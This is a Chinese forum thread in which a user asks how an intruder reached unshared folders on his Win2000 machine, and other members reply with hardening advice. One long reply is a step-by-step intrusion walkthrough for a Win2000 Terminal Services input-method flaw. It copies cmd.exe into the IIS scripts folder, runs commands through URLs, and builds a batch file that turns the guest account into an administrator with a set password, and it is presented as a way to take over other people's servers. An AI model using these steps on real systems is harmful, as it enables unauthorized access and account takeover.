在局域网中被人入侵,寻求解决办法!(200分)

  • 主题发起人 主题发起人 yz
  • 开始时间 开始时间
Y

yz

Unregistered / Unconfirmed
GUEST, unregistred user!
前天下午,正在干活,突然发现硬盘狂转,当时就想有人在访问我的机器(有几个共享目录)
于是就打开管理工具中的计算机管理,看看谁在访问,居然发现有人在访问我未共享的目录中
的东东(电影)。
谁有碰到这种情况,知道如何解决,请速告知,不甚感激。
取消共享此类办法请勿提。
机器: Win2000 + SP2
管理员密码泄漏的可能性极小。
另:Win2000中也不存在98下共享密码的bug。
 
被装了木马。 要不就是密码被盗。 人家用 //servername/C$ 之类的方法访问
如果是装了木马。 装个端口监视器看看就知道是否是木马了。
 
设置了目录权限了吗?
把everyone的权限del了
 
W2K有漏洞:

由于微软对中国产品不付责任的态度,使得安装了终端服务和全拼
(^^在全拼下测试成功)的w2k 服务器存在着远程登陆并能获取超
级用户权限的严重漏洞。不需上传任何文件成功入侵并装个后门。
其过程如下:

1.扫描 3389 port 终端服务默认;
2.用终端客户端程序进行连接;
3.按ctrl+shift调出全拼输入法(其他似乎不行),
点鼠标右键(如果其帮助菜单发灰,就赶快赶下家吧,人家打补丁了),
点帮助,点输入法入门;
4.在"选项"菜单上点右键--->跳转到URL",输入:c:/winnt/system32/cmd.exe.
(如果不能确定NT系统目录,则输入:c:/ 或d:/ ……进行查找确定);
5.选择"保存到磁盘" 选择目录:c:/inetpub/scripts/,因实际上是对方服务器
上文件自身的复制操作,所以这个过程很快就会完成;
6.打开IE,输入:http://ip/scripts/cmd.exe?/c dir 怎么样?有cmd.exe文件了吧?
这我们就完成了第一步;
7.http://ip/scripts/cmd.exe?/c echo net user guest /active:yes>go.bat
8.http://ip/scripts/cmd.exe?/c echo net user guest elise>>go.bat
9.http://ip/scripts/cmd.exe?/c echo net localgroup administrators /add guest>>go.bat
10.http://ip/scripts/cmd.exe?/c type go.bat 看看我们的批文件内容是否如下:

net user guest /active:yes
net user guest elise
net localgroup administrators /add guest
11.在"选项"菜单上点右键--->跳转到URL",输入:c:/inetpub/scripts/go.bat --->
在磁盘当前位置执行;
12.呵呵,大功告成啦,这样我们就激活了服务器的geust帐户,密码为:elise,超级用户呢!
(我喜欢guest而不是建立新帐户,这样似乎不易被发现些),这样你就可用IPC$连接,想怎
样做就怎样做了,当然,你也可用guest直接登陆到他的服务器,到他机器上去跳舞吧:)

 
SP2是不够的,如果是WEB服务,最好安装URLSCAN和IIS Lock TOOL;
如果一般工作使用,最好将一些不要用的端口关闭
redsky.l的方法似乎只对WEB服务器有用的,是不是就是Unicode漏洞?
这方面的资料可以到这个网站看看:
www.chinaefocus.com
 
我有一招对付iis漏洞的办法比较彻底,hehe,delete cmd.exe

本题我同意王寒松的观点,一般说来我一上来就去掉 nt的几个缺省账号和共享.
 
我一般都把硬盘的权限设为只有管理员才能放问的
共享的时候再加上别的用户
这样的话,除了木马应该没有其他办法了吧?
木马好办,装个天网什么的防火墙,所有程序访问网络都要经过我的批准。
 
你确信你是被入侵了吗?既然你设了共享,就有可能是公司内部的人看看
你的机器呀!
何况是看电影这种小东东!
 
同意王寒松的观点。
关闭guest,改名administrator
查看一下有没木马
 
多人接受答案了。
 
后退
顶部